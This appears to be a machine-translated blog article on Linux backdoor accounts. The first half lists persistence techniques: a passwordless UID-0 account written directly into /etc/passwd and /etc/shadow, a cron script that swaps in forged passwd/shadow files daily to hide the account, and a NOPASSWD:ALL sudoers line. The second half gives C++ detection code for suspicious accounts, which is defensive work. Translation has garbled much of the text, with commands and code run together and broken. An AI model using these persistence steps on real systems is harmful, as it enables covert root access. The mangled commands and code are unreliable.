Linux hackers/suspicious Account Detection

Catalog

1 . Linux hacker account attack vector 2. Linux Suspicious account detection model

1. Linux Hacker account attack vectors

0x1: Add a hacker account to the "root" group

1. Useradd Hacker-p hacker1232. Usermod-a-G root hacker3. ID Hacker

0x2: Do not use system instructions to add SYSTEM account

1. vim/etc/passwd Add a line: musicyxy:x:0:0::/:/bin/bash2. vim/etc/Shadow New line: Musicyxy::13407:0:99999:7: ::  !wq

0X3: Account hiding based on crontab

1 use Crontab (Scheduled tasks) to hide hacker accounts 2. Back up the forged passwd and shadow files used to hide the hacker account to other places (such as/TMP/PASSWD,/tmp/shadow), the original directory (/etc/passwd,/etc/shadow) remains unchanged  3. Will musicyxy:x:0:0::/:/bin/sh and Musicyxy::13407:0:99999:7 ::: Two messages appended to forged passwd and shadow files 4. Then replace the forged passwd, shadow files with the/etc/directory at a fixed time of day, and make a backup of the original normal files, restore the original normal files back after the time window 5 

Shell

#!/bin/Bash//daily 11:40 Run cat/etc/passwd >/dev/ttypwdEcho'* * * * * cat/etc/passwd >/dev/ttypwd'>>/etc/Door.cron;echo'* * * * * cat/etc/shadow >/dev/ttysdw'>>/etc/Door.cron;echo'* * * echo "musicyxy:x:0:0::/:/bin/sh" >>/etc/passwd'>>/etc/Door.cron;echo'* * * echo "Musicyxy::9999:0:99999:7:::" >>/etc/shadow'>>/etc/Door.cron;//Roll back the original normal passwd, shadow file 12:9 dailyEcho'* * * * * cat/dev/ttypwd >/etc/passwd'>>/etc/Door.cron;echo'* * * * * cat/dev/ttysdw >/etc/shadow'>>/etc/Door.cron;echo'Ten * * * rm-f/dev/ttypwd'>>/etc/Door.cron;echo'Ten * * * rm-f/DEV/TTYSDW'>>/etc/door.cron;service Crond Restart;crontab/etc/door.cron;

In this way, every day the back door account survival time window is 11:40~12:09

0x4: Add Uid=0 's non-root account

 1 . Add Normal User: Useradd hacker-p hacker123  //  The newly created user will create a user directory under/home hacker  2  -rf/home/ hacker  3  /etc/PASSWD change the newly added user uid and GID to 0:hacker: X:  501 : 501 ::/home/hacker:/bin/ Bash-Hacker:x:0 : 0 ::/home/hacker :/bin/bashoruseradd -u 

0x5: Hide high-privileged accounts based on sudo instructions

Regardless of where the sudoers file is, sudo provides a command to edit the file: Visudo to modify the file, it will help you verify that the file configuration is correct, if it is not correct, you will be prompted to save the exit when the configuration error

<user list> operator list> <tag list> <command list>// Hacker all= (All) Nopasswd:all 1. User list: Users/groups, or alias list of users already set, user name directly username, user group plus%, such as%admin2. Host list: hostname or alias list  3operator  List:runas user, that is, which user, group permissions can be executed 45. Command list: Commands or lists that can be executed

Hacker attack means

1. vim/etc/sudoers2. Add one line: Hacker all=(All) Nopasswd:all3. Sudo-u root/mnt/sudodir/cmd, do not need to enter the password 4. This allows the hacker user to convert to any user and execute arbitrary commands.

Relevant Link:

http://read.newbooks.com.cn/info/156976.htmlhttp://http://  http://www.linux521.com/2009/system/201005/11198.htmlhttp://  www.linux521.com/2009/system/201005/11198.htmlhttps://linux.cn/article-2655-1.html http://chenall.net/post/linux-sudo-config/

2. Linux Suspicious account detection model

0x1: Detect non-root users of the root user group

1. Via bash command: cut-d:-f1/etc/passwd, get the current account list 2. Iterate through the list, call Getpwnam, Getgrgid get pw_ for each account Name, Pw_uid, Pw_gid3. Detect the presence of an    exception account 1) non-root account, but    uid 02  non-root account, but GID is 0    3) non-root account, but Shell is/bin/bash,/bin/sh (non-/sbin/nologin)

Code Example

#include <iostream>#include<stdio.h>#include<stdlib.h>#include<grp.h>#include<pwd.h>#include<unistd.h>#include<errno.h>#include<sys/types.h>voidGetUserInfo (Const Char*name) {    structpasswd*PW; structgroup*GRP; if(Name = =NULL) {                return; } PW= (structpasswd*) malloc (sizeof(structpasswd)); GRP= (structgroup*) malloc (sizeof(structgroup)); PW=Getpwnam (name); if(!PW) {printf ("couldn ' t find out about user%s,%d.\n", name, errno); return; } printf ("User login name is%s.\n", pw->pw_name); printf ("User uid is%d.\n", (int) (pw->pw_uid)); printf ("User GID is%d.\n", (int) (pw->pw_gid)); printf ("User Home is directory is%s.\n", pw->Pw_dir); printf ("User default shell is%s.\n", pw->Pw_shell); //Group InfoGRP = Getgrgid (pw->Pw_gid); if(!GRP) {printf ("couldn ' t find out about group%d.\n", (int) pw->Pw_gid); return; } printf ("User Default group is%s (%d). \ n", Grp->gr_name, (int) (pw->pw_gid)); return;}intMain () {FILE*FP = Popen ("cut-d:-f1/etc/passwd","R"); if(fp = =NULL) {                return 0; }        Charline[1024x768];  while(Fgets (line,1024x768, fp)! =NULL) {                //std::cout << Line;GetUserInfo ((Const Char*) line);        } pclose (FP); return 0;}//g++ healthchcker.cpp-o Healthchcker

Relevant Link:

http://blog.csdn.net/xocoder/article/details/8987135http://pubs.opengroup.org/ onlinepubs/009695399/basedefs/pwd.h.htmlhttps://www.mkssoftware.com/docs/man5/struct_ Group.5.asphttp://www.embedu.org/column/Column185.htmhttp: // Www.cnblogs.com/hnrainll/archive/2011/05/07/2039692.html

0x2:/etc/sudoers anomaly Configuration detection

1. Open/etc/sudoers2. Recursive handling of the include case 3. Check for suspicious configurations other than "root    all= (     All)all"

Copyright (c) Littlehann All rights reserved

Linux hackers/suspicious Account Detection